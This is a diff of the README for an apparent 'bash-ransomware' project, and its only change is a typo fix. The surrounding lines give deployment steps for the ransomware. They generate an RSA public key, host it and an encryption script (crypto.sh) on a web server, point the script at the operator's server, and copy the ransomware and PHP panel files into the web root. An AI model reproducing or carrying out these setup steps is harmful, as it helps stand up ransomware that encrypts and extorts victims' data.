SubtleScope/bash-ransomware/README.md

  - $ openssl rsa -pubout -in priv.pem -out pub.pem
  - $ mkdir -p /var/www/html/downloads
  - $ cp pub.pem /var/www/html/downloads/
- - > Modify crypto.sh and replace the IPwith your web server's IP/URL
+ - > Modify crypto.sh and replace the IP with your web server's IP/URL
  - $ cp crypto.sh /var/www/html/downloads/
  - > Copy all of the ransomware files to /var/www/html
  - > You should have all of the php files in the root of your web dir (/var/www/html/)